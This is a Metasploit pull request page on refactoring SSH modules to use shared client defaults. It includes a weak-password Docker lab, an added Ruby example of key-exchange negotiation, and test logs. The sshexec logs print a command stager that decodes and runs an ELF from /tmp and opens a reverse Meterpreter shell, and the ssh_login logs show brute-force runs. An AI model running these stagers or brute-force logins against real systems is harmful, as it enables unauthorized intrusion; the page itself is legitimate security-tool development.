
Making SSH defaults widely used #16379

Merged: 35 commits merged into rapid7:master on Apr 20, 2022

Conversation

heyder (Contributor) commented Mar 24, 2022

This PR fixes #16328 and depends on #16318 (which sets append_all_supported_algorithms to true in lib/msf/core/exploit/remote/ssh.rb) being landed.

Environment

FROM alpine:latest

RUN apk add --update
RUN apk --no-cache add openssh
RUN ssh-keygen -A
RUN echo 'root:toor' | chpasswd

RUN echo $' AuthorizedKeysFile .ssh/authorized_keys\n\
GatewayPorts no \n\
X11Forwarding no \n\
Subsystem       sftp    /usr/lib/ssh/sftp-server \n\
PasswordAuthentication yes \n\
AllowTcpForwarding yes \n\
PasswordAuthentication yes \n\
AllowTcpForwarding yes' > /etc/ssh/sshd_config

RUN echo "KexAlgorithms diffie-hellman-group1-sha1"  >> /etc/ssh/sshd_config

RUN addgroup -g 700 bob \
    && adduser -G bob -D -u 700 -S -h /home/bob -s /bin/sh bob
RUN echo -n 'bob:Password1' | chpasswd

EXPOSE 22

CMD ["/usr/sbin/sshd","-D"]

Tests

before


msf6 auxiliary(scanner/ssh/ssh_login) > set SSH_DEBUG true
SSH_DEBUG => true
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 127.0.0.1:2222 - Starting bruteforce
D, [2022-03-19T15:33:25.204312 #1997] DEBUG -- net.ssh.transport.session[4114]: establishing connection to 127.0.0.1:2222
D, [2022-03-19T15:33:25.209648 #1997] DEBUG -- net.ssh.transport.session[4114]: connection established
I, [2022-03-19T15:33:25.210322 #1997]  INFO -- net.ssh.transport.server_version[4128]: negotiating protocol version
D, [2022-03-19T15:33:25.210545 #1997] DEBUG -- net.ssh.transport.server_version[4128]: local is `SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3'
D, [2022-03-19T15:33:25.219134 #1997] DEBUG -- net.ssh.transport.server_version[4128]: remote is `SSH-2.0-OpenSSH_8.8'
I, [2022-03-19T15:33:25.222597 #1997]  INFO -- net.ssh.transport.algorithms[413c]: sending KEXINIT
D, [2022-03-19T15:33:25.224080 #1997] DEBUG -- socket[4150]: queueing packet nr 0 type 20 len 796
D, [2022-03-19T15:33:25.224770 #1997] DEBUG -- socket[4150]: sent 800 bytes
D, [2022-03-19T15:33:25.225522 #1997] DEBUG -- socket[4150]: read 840 bytes
D, [2022-03-19T15:33:25.225826 #1997] DEBUG -- socket[4150]: received packet nr 0 type 20 len 836
I, [2022-03-19T15:33:25.226130 #1997]  INFO -- net.ssh.transport.algorithms[413c]: got KEXINIT from server
I, [2022-03-19T15:33:25.226356 #1997]  INFO -- net.ssh.transport.algorithms[413c]: negotiating algorithms
[-] 127.0.0.1:2222 - Failed: 'bob:Password1'
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

after proper exception handling

The previous implementation misled the user by reporting that authentication had failed when it had in fact been unable to settle on a key exchange algorithm.


msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 127.0.0.1:2222 - Starting bruteforce
D, [2022-03-19T16:08:57.756054 #4749] DEBUG -- net.ssh.transport.session[3d68]: establishing connection to 127.0.0.1:2222 through proxy
D, [2022-03-19T16:08:57.758002 #4749] DEBUG -- net.ssh.transport.session[3d68]: connection established
I, [2022-03-19T16:08:57.758427 #4749]  INFO -- net.ssh.transport.server_version[3d7c]: negotiating protocol version
D, [2022-03-19T16:08:57.758713 #4749] DEBUG -- net.ssh.transport.server_version[3d7c]: local is `SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3'
D, [2022-03-19T16:08:57.788388 #4749] DEBUG -- net.ssh.transport.server_version[3d7c]: remote is `SSH-2.0-OpenSSH_8.8'
I, [2022-03-19T16:08:57.792768 #4749]  INFO -- net.ssh.transport.algorithms[3d90]: sending KEXINIT
D, [2022-03-19T16:08:57.793691 #4749] DEBUG -- socket[3da4]: queueing packet nr 0 type 20 len 796
D, [2022-03-19T16:08:57.794045 #4749] DEBUG -- socket[3da4]: sent 800 bytes
D, [2022-03-19T16:08:57.794369 #4749] DEBUG -- socket[3da4]: read 840 bytes
D, [2022-03-19T16:08:57.794814 #4749] DEBUG -- socket[3da4]: received packet nr 0 type 20 len 836
I, [2022-03-19T16:08:57.795104 #4749]  INFO -- net.ssh.transport.algorithms[3d90]: got KEXINIT from server
I, [2022-03-19T16:08:57.795577 #4749]  INFO -- net.ssh.transport.algorithms[3d90]: negotiating algorithms
[-] 127.0.0.1:2222 - Could not connect: could not settle on kex algorithm
Server kex preferences: diffie-hellman-group1-sha1
Client kex preferences: ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) >

❗ All tests from here on were performed with the same changes made in #16318 (setting append_all_supported_algorithms to true).

I didn't commit it again here to avoid conflicts during the merge.

after ssh defaults merge


msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 127.0.0.1:2222 - Starting bruteforce
[+] 127.0.0.1:2222 - Success: 'bob:Password1' 'uid=700(bob) gid=700(bob) groups=700(bob),700(bob) Linux 7ccf5b4903f9 5.10.60.1-microsoft-standard-WSL2 #1 SMP Wed Aug 25 23:20:18 UTC 2021 x86_64 Linux '
[!] No active DB -- Credential data will not be saved!
[*] SSH session 2 opened (127.0.0.1:53511 -> 127.0.0.1:2222 ) at 2022-03-19 20:38:29 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) >

test pivot


msf6 auxiliary(scanner/http/http_version) > route add 10.0.5.3 2
[*] Route added
msf6 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 10.0.5.3
RHOSTS => 10.0.5.3
msf6 auxiliary(scanner/http/http_version) > run
D, [2022-03-20T19:35:30.594267 #7475] DEBUG -- socket[3da4]: using encrypt-then-mac
D, [2022-03-20T19:35:30.595014 #7475] DEBUG -- socket[3da4]: queueing packet nr 25 type 90 len 80
D, [2022-03-20T19:35:31.093781 #7475] DEBUG -- socket[3da4]: sent 148 bytes
D, [2022-03-20T19:35:31.099156 #7475] DEBUG -- socket[3da4]: read 100 bytes
D, [2022-03-20T19:35:31.099588 #7475] DEBUG -- socket[3da4]: received packet nr 57 type 91 len 32
I, [2022-03-20T19:35:31.099940 #7475]  INFO -- net.ssh.connection.session[3de0]: channel_open_confirmation: 7 1 2097152 32768
D, [2022-03-20T19:35:31.602128 #7475] DEBUG -- socket[3da4]: using encrypt-then-mac
D, [2022-03-20T19:35:31.604293 #7475] DEBUG -- socket[3da4]: queueing packet nr 26 type 94 len 144
D, [2022-03-20T19:35:31.605715 #7475] DEBUG -- socket[3da4]: sent 212 bytes
D, [2022-03-20T19:35:31.614001 #7475] DEBUG -- socket[3da4]: read 324 bytes
D, [2022-03-20T19:35:31.615644 #7475] DEBUG -- socket[3da4]: received packet nr 58 type 94 len 256
I, [2022-03-20T19:35:31.618024 #7475]  INFO -- net.ssh.connection.session[3de0]: channel_data: 7 237b

[+] 10.0.5.3:80 lighttpd/1.4.64
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

both modules after all changes


msf6 exploit(multi/ssh/sshexec) > run

[*] Started reverse TCP handler on 192.168.137.1:4444
[*] 127.0.0.1:2222 - Sending stager...
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjrAAAAggEAAAcAAAAAEAAAagJYzYCFwHQGMcCwAc2AsELNgGoCWM2AhcB17WoKXjHb9+NTQ1NqArBmieHNgJdbaMCoiQFoAgARXInhamZYUFFXieFDzYCFwHkZTnQ9aKIAAABYagBqBYnjMcnNgIXAeb3rJ7IHuQAQAACJ48HrDMHjDLB9zYCFwHgQW4nhmbJqsAPNgIXAeAL/4bgBAAAAuwEAAADNgA==>>'/tmp/EcmDF.b64'", "((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/WfpUJ' < '/tmp/EcmDF.b64' ; chmod +x '/tmp/WfpUJ' ; '/tmp/WfpUJ' ; rm -f '/tmp/WfpUJ' ; rm -f '/tmp/EcmDF.b64'"]
[*] Executing echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjrAAAAggEAAAcAAAAAEAAAagJYzYCFwHQGMcCwAc2AsELNgGoCWM2AhcB17WoKXjHb9+NTQ1NqArBmieHNgJdbaMCoiQFoAgARXInhamZYUFFXieFDzYCFwHkZTnQ9aKIAAABYagBqBYnjMcnNgIXAeb3rJ7IHuQAQAACJ48HrDMHjDLB9zYCFwHgQW4nhmbJqsAPNgIXAeAL/4bgBAAAAuwEAAADNgA==>>'/tmp/EcmDF.b64'
[*] Command Stager progress -  42.75% done (342/800 bytes)
[*] Executing ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/WfpUJ' < '/tmp/EcmDF.b64' ; chmod +x '/tmp/WfpUJ' ; '/tmp/WfpUJ' ; rm -f '/tmp/WfpUJ' ; rm -f '/tmp/EcmDF.b64'
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (989032 bytes) to 192.168.137.1
[*] Meterpreter session 1 opened (192.168.137.1:4444 -> 192.168.137.1:51037 ) at 2022-03-24 22:48:48 +0100
[!] Timed out while waiting for command to return
[*] Command Stager progress - 100.00% done (800/800 bytes)

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/ssh/sshexec) > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set SSH_DEBUG false
SSH_DEBUG => false
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 127.0.0.1:2222 - Starting bruteforce
[+] 127.0.0.1:2222 - Success: 'bob:Password1' 'uid=700(bob) gid=700(bob) groups=700(bob),700(bob) Linux e6dc4f387859 5.10.60.1-microsoft-standard-WSL2 #1 SMP Wed Aug 25 23:20:18 UTC 2021 x86_64 Linux '
[!] No active DB -- Credential data will not be saved!
[*] SSH session 2 opened (?? -> ?? ) at 2022-03-24 22:49:17 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Commit messages:

- Factory is provided by mixin
- Removed the options that were the same as the defaults
- Adjusted the exception to properly give feedback to the user. It was returning "incorrect" when it was in fact unable to negotiate the key exchange.
- Merge ssh defaults
- Remove options equal to default
- Auxiliary failed: NameError undefined local variable or method `datastore' for #<Metasploit::Framework::LoginScanner::SSH
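The "before" run above shows a key-exchange negotiation failure being reported as a bad password. The following Ruby is an added example (not code from this PR, from Metasploit or from net-ssh): it applies the RFC 4253 section 7.1 negotiation rule to the preference lists printed in the log, raises when the two sides share no algorithm, and reports that outcome separately from an authentication result, which is the distinction the PR's exception handling restores. The sample preference lists are taken from the log lines in this PR; the legacy list, the status symbols and the weak-algorithm set are assumptions made for the example.

```ruby
# Added example, not code from the PR, Metasploit or net-ssh.
# Demonstrates SSH KEX negotiation (RFC 4253 section 7.1) on the preference
# lists logged above, and why a KEX failure must not be reported as a
# credential failure.

# Server list, as printed in the failing run (constructed from the PR log).
SERVER_KEX = %w[diffie-hellman-group1-sha1].freeze

# Client list, as printed in the failing run (constructed from the PR log).
CLIENT_KEX_DEFAULT = %w[
  ecdh-sha2-nistp521 ecdh-sha2-nistp384 ecdh-sha2-nistp256
  diffie-hellman-group-exchange-sha256 diffie-hellman-group14-sha1
].freeze

# Assumed subset of the legacy algorithms that append_all_supported_algorithms
# re-enables; the authoritative list lives in net-ssh, not here.
LEGACY_KEX = %w[diffie-hellman-group-exchange-sha1 diffie-hellman-group1-sha1].freeze

# Assumed defender's set of KEX algorithms to flag (SHA-1 and/or 1024-bit MODP).
WEAK_KEX = %w[
  diffie-hellman-group1-sha1 diffie-hellman-group-exchange-sha1 diffie-hellman-group14-sha1
].freeze

class KexNegotiationError < StandardError; end

# RFC 4253 7.1: walk the client's list in order and pick the first algorithm
# the server also supports; if none matches, the connection cannot proceed.
def negotiate_kex(client_prefs, server_prefs)
  chosen = client_prefs.find { |alg| server_prefs.include?(alg) }
  return chosen if chosen

  raise KexNegotiationError, "could not settle on kex algorithm\n" \
    "Server kex preferences: #{server_prefs.join(',')}\n" \
    "Client kex preferences: #{client_prefs.join(',')}"
end

# Mirrors the post-fix behaviour in spirit: a KEX failure is a transport
# problem and is surfaced as such, never as a password verdict. Status symbols
# are assumptions for this example.
def classify_attempt(client_prefs, server_prefs)
  alg = negotiate_kex(client_prefs, server_prefs)
  { status: :connected, kex: alg, weak_kex: WEAK_KEX.include?(alg) }
rescue KexNegotiationError => e
  { status: :unable_to_connect, reason: e.message.lines.first.chomp }
end

if __FILE__ == $PROGRAM_NAME
  # Default client list against the legacy-only server: no shared algorithm.
  p classify_attempt(CLIENT_KEX_DEFAULT, SERVER_KEX)
  # With the legacy algorithms appended the handshake settles, but on a weak KEX.
  p classify_attempt(CLIENT_KEX_DEFAULT + LEGACY_KEX, SERVER_KEX)
end
```

Run as a script, the first call returns the unable-to-connect result with the same reason string the fixed module prints, and the second returns a connected result whose `weak_kex` flag is set. From a defender's side, a server that offers only diffie-hellman-group1-sha1 is itself a finding worth reporting, independent of whether any login succeeds.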
heyder (Contributor, Author) commented Mar 25, 2022

Rspec output

$ rspec ./spec/lib/metasploit/framework/login_scanner/ssh_spec.rb

Run options: include {:focus=>true}

All examples were filtered out; ignoring {:focus=>true}

Randomized with seed 51378
...........................................................

Top 10 slowest examples (0.13319 seconds, 41.4% of total time):
  Metasploit::Framework::LoginScanner::SSH#attempt_login with a key calls Net::SSH with the correct arguments
    0.05133 seconds ./spec/lib/metasploit/framework/login_scanner/ssh_spec.rb:162
  Metasploit::Framework::LoginScanner::SSH is expected to respond to #verbosity
    0.03216 seconds ./spec/lib/metasploit/framework/login_scanner/ssh_spec.rb:61
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base validations cred_details is not valid for a non-array input
    0.00786 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:192
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base validations #valid! raises a Metasploit::Framework::LoginScanner::Invalid when validations fail
    0.00757 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:274
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base validations port is not valid for a non-number
    0.00671 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:85
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base validations host is not valid for not set
    0.00605 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:129
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base #each_credential when login_scanner has no REALM_KEY when the credential does not have a realm simply yields the original credential
    0.00583 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:401
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base validations stop_on_success is not valid for not set
    0.0055 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:245
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base validations connection_timeout is not valid for a floating point
    0.00538 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:219
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base validations stop_on_success is not valid for the string true
    0.00482 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:250

Finished in 0.32202 seconds (files took 5.54 seconds to load)
59 examples, 0 failures

Randomized with seed 51378

heyder (Contributor, Author) commented Mar 25, 2022

After #16318 lands, it will be necessary to change the tests for the ssh login scanner, specifically adding append_all_supported_algorithms => true to

opt_hash = {
  :port => ssh_scanner.port,
  :use_agent => false,
  :config => false,
  :verbose => ssh_scanner.verbosity,
  :proxy => factory,
  :auth_methods => ['password','keyboard-interactive'],
  :password => private,
  :non_interactive => true,
  :verify_host_key => :never
}

It should be something like this:

 opt_hash = {
            :port            => ssh_scanner.port,
            :use_agent       => false,
            :config          => false,
            :verbose         => ssh_scanner.verbosity,
            :proxy           => factory,
            :append_all_supported_algorithms => true,
            :auth_methods    => ['password','keyboard-interactive'],
            :password        => private,
            :non_interactive => true,
            :verify_host_key => :never
        }

sempervictus (Contributor)

Neat, thank you

bwatters-r7 (Contributor)

This is a really solid start; we should move on with these changes, but we also need to start looking at other modules that might need this kind of change and list them out.

heyder (Contributor, Author) commented Apr 6, 2022

This seems a good list to look at:

$ git grep   Net::SSH.start
lib/metasploit/framework/login_scanner/ssh.rb:              self.ssh_socket = Net::SSH.start(
modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb:        Net::SSH.start(ip, user, opts)
modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb:        Net::SSH.start(ip, 'admin', ssh_opts)
modules/auxiliary/scanner/ssh/fortinet_backdoor.rb:        Net::SSH.start(ip, 'Fortimanager_Access', ssh_opts)
modules/auxiliary/scanner/ssh/juniper_backdoor.rb:        Net::SSH.start(
modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb:        Net::SSH.start(ip, username, ssh_opts)
modules/auxiliary/scanner/ssh/ssh_enumusers.rb:        Net::SSH.start(ip, user, opts)
modules/exploits/apple_ios/ssh/cydia_default_ssh.rb:        ssh = Net::SSH.start(rhost, user, opts)
modules/exploits/linux/http/alienvault_exec.rb:      Net::SSH.start(rhost, "root", opts)
modules/exploits/linux/http/cisco_firepower_useradd.rb:          Net::SSH.start(rhost, 'admin',
modules/exploits/linux/http/cisco_firepower_useradd.rb:        @ssh_socket = Net::SSH.start(rhost, user, opts)
modules/exploits/linux/http/ubiquiti_airos_file_upload.rb:        Net::SSH.start(rhost, username, ssh_opts)
modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb:        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
modules/exploits/linux/ssh/cisco_ucs_scpuser.rb:        ssh = Net::SSH.start(rhost, user, opts)
modules/exploits/linux/ssh/exagrid_known_privkey.rb:        ssh_socket = Net::SSH.start(rhost, 'root', ssh_options)
modules/exploits/linux/ssh/f5_bigip_known_privkey.rb:        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
modules/exploits/linux/ssh/ibm_drm_a3user.rb:          Net::SSH.start(rhost, user, opts)
modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb:        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
modules/exploits/linux/ssh/mercurial_ssh_exec.rb:        ssh = Net::SSH.start(rhost, username, ssh_options)
modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb:        ssh = Net::SSH.start(rhost, user, opts)
modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb:        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb:        ssh = Net::SSH.start(rhost, user, opts)
modules/exploits/linux/ssh/solarwinds_lem_exec.rb:        ssh = Net::SSH.start(rhost, username, opts)
modules/exploits/linux/ssh/symantec_smg_ssh.rb:        ssh = Net::SSH.start(rhost, user, opts)
modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb:        ssh_socket = Net::SSH.start(rhost, 'admin', opt_hash)
modules/exploits/linux/ssh/vyos_restricted_shell_privesc.rb:        ssh = Net::SSH.start(rhost, username, opts)
modules/exploits/linux/ssh/vyos_restricted_shell_privesc.rb:        ssh = Net::SSH.start(rhost, username, opts)
modules/exploits/multi/ssh/sshexec.rb:      self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
modules/exploits/solaris/ssh/pam_username_bof.rb:    Net::SSH.start(rhost, '', ssh_client_opts)
modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb:        ssh = Net::SSH.start(datastore['RHOST'], 'root', opts)
modules/exploits/unix/ssh/arista_tacplus_shell.rb:        Net::SSH.start(rhost, username, opts)
modules/exploits/unix/ssh/arista_tacplus_shell.rb:        ssh = Net::SSH.start(rhost, username, opts)
modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb:        ssh = Net::SSH.start(rhost, user, opts)
modules/exploits/windows/ssh/sysax_ssh_username.rb:      ssh = Net::SSH.start(

heyder (Contributor, Author) commented Apr 13, 2022

  • lib/metasploit/framework/login_scanner/ssh.rb
  • modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb | additional changes: removed sh.exec string from the command input|
  • modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
  • modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
  • modules/auxiliary/scanner/ssh/juniper_backdoor.rb
  • modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
  • modules/auxiliary/scanner/ssh/ssh_enumusers.rb
  • modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
  • modules/exploits/linux/http/alienvault_exec.rb
  • modules/exploits/linux/http/cisco_firepower_useradd.rb
  • modules/exploits/linux/http/ubiquiti_airos_file_upload.rb
  • modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
  • modules/exploits/linux/ssh/cisco_ucs_scpuser.rb
  • modules/exploits/linux/ssh/exagrid_known_privkey.rb
  • modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
  • modules/exploits/linux/ssh/ibm_drm_a3user.rb
  • modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb
  • modules/exploits/linux/ssh/mercurial_ssh_exec.rb | not sure about Lint/ShadowingOuterLocalVariable
  • modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb
  • modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
  • modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
  • modules/exploits/linux/ssh/solarwinds_lem_exec.rb
  • modules/exploits/linux/ssh/symantec_smg_ssh.rb
  • modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
  • modules/exploits/linux/ssh/vyos_restricted_shell_privesc.rb
  • modules/exploits/linux/ssh/vyos_restricted_shell_privesc.rb
  • modules/exploits/multi/ssh/sshexec.rb
  • modules/exploits/solaris/ssh/pam_username_bof.rb
  • modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
  • modules/exploits/unix/ssh/arista_tacplus_shell.rb
  • modules/exploits/unix/ssh/arista_tacplus_shell.rb
  • modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
  • modules/exploits/windows/ssh/sysax_ssh_username.rb

Extra changes performed

apache_karaf_command_execution

There was a shell:exec string passed as an extra argument to Net::SSH's exec! method.

before removal

msf6 auxiliary(scanner/ssh/apache_karaf_command_execution) > run

[*] 127.0.0.1:2222 - Attempt to login...
[+] 127.0.0.1:2222 - Login Successful ('bob:Password1)'
[+] 127.0.0.1:2222 - Command successfully executed.  Output: sh: shell:exec: not found

after removal

msf6 auxiliary(scanner/ssh/apache_karaf_command_execution) > set CMD whoami
CMD => whoami
msf6 auxiliary(scanner/ssh/apache_karaf_command_execution) > exploit 

[*] 127.0.0.1:2222 - Attempt to login...
[+] 127.0.0.1:2222 - Login Successful ('bob:Password1)'
[+] 127.0.0.1:2222 - Command successfully executed.  Output: bob

[*] 127.0.0.1:2222 - Loot stored at: apache.karaf.command
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/apache_karaf_command_execution) > 

@heyder heyder marked this pull request as draft April 13, 2022 17:04
@jheysel-r7 jheysel-r7 self-assigned this Apr 14, 2022
jheysel-r7 (Contributor)

#16379 (comment)

@heyder Great work so far. Let me know if you'd like me help out making some of the changes in the above list. Would love to help, I just wouldn't want to duplicate effort. Cheers.

heyder (Contributor, Author) commented Apr 15, 2022

#16379 (comment)

@heyder Great work so far. Let me know if you'd like me help out making some of the changes in the above list. Would love to help, I just wouldn't want to duplicate effort. Cheers.

Sure. Let's split what is missing by two. You can get from modules/exploits/linux/ssh/solarwinds_lem_exec.rb until the end of the list.

@heyder heyder marked this pull request as ready for review April 18, 2022 18:21
@jheysel-r7 jheysel-r7 merged commit 4417a33 into rapid7:master Apr 20, 2022
jheysel-r7 (Contributor)

Testing after changes looking good:

msf6 exploit(multi/ssh/sshexec) > run

[*] Started reverse TCP handler on 192.168.123.1:4442
[*] 127.0.0.1:2222 - Sending stager...
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjrAAAAggEAAAcAAAAAEAAAagJYzYCFwHQGMcCwAc2AsELNgGoCWM2AhcB17WoKXjHb9+NTQ1NqArBmieHNgJdbaMCoewFoAgARWonhamZYUFFXieFDzYCFwHkZTnQ9aKIAAABYagBqBYnjMcnNgIXAeb3rJ7IHuQAQAACJ48HrDMHjDLB9zYCFwHgQW4nhmbJqsAPNgIXAeAL/4bgBAAAAuwEAAADNgA==>>'/tmp/ZzavV.b64'", "((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/fKhOr' < '/tmp/ZzavV.b64' ; chmod +x '/tmp/fKhOr' ; '/tmp/fKhOr' ; rm -f '/tmp/fKhOr' ; rm -f '/tmp/ZzavV.b64'"]
[*] Executing echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjrAAAAggEAAAcAAAAAEAAAagJYzYCFwHQGMcCwAc2AsELNgGoCWM2AhcB17WoKXjHb9+NTQ1NqArBmieHNgJdbaMCoewFoAgARWonhamZYUFFXieFDzYCFwHkZTnQ9aKIAAABYagBqBYnjMcnNgIXAeb3rJ7IHuQAQAACJ48HrDMHjDLB9zYCFwHgQW4nhmbJqsAPNgIXAeAL/4bgBAAAAuwEAAADNgA==>>'/tmp/ZzavV.b64'
[*] Command Stager progress -  42.75% done (342/800 bytes)
[*] Executing ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/fKhOr' < '/tmp/ZzavV.b64' ; chmod +x '/tmp/fKhOr' ; '/tmp/fKhOr' ; rm -f '/tmp/fKhOr' ; rm -f '/tmp/ZzavV.b64'
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (989032 bytes) to 192.168.123.1
[*] Meterpreter session 4 opened (192.168.123.1:4442 -> 192.168.123.1:50741 ) at 2022-04-19 21:48:20 -0700
[!] Timed out while waiting for command to return
[*] Command Stager progress - 100.00% done (800/800 bytes)

meterpreter > exit
[*] Shutting down Meterpreter...
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 127.0.0.1:2222 - Starting bruteforce
[+] 127.0.0.1:2222 - Success: 'bob:Password1' 'uid=700(bob) gid=700(bob) groups=700(bob),700(bob) Linux b745012011d2 5.10.47-linuxkit #1 SMP Sat Jul 3 21:51:47 UTC 2021 x86_64 Linux '
[*] SSH session 3 opened (127.0.0.1:50631 -> 127.0.0.1:2222 ) at 2022-04-19 21:39:18 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 auxiliary(scanner/ssh/apache_karaf_command_execution) > set cmd whoami
cmd => whoami
msf6 auxiliary(scanner/ssh/apache_karaf_command_execution) > run

[*] 127.0.0.1:2222 - Attempt to login...
[+] 127.0.0.1:2222 - Login Successful ('bob:Password1)'
[+] 127.0.0.1:2222 - Command successfully executed.  Output: bob

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@heyder heyder deleted the fix/ssh_defaults_usage branch April 20, 2022 07:01
@dwelch-r7 dwelch-r7 added the rn-fix release notes fix label Apr 22, 2022
dwelch-r7 (Contributor)

Release Notes

Refactored a number of modules to use ssh_client_defaults

Labels: bug, easy, rn-fix release notes fix

Linked issue (may be closed by this pull request): SSH Client Defaults Are Not Widely Used

7 participants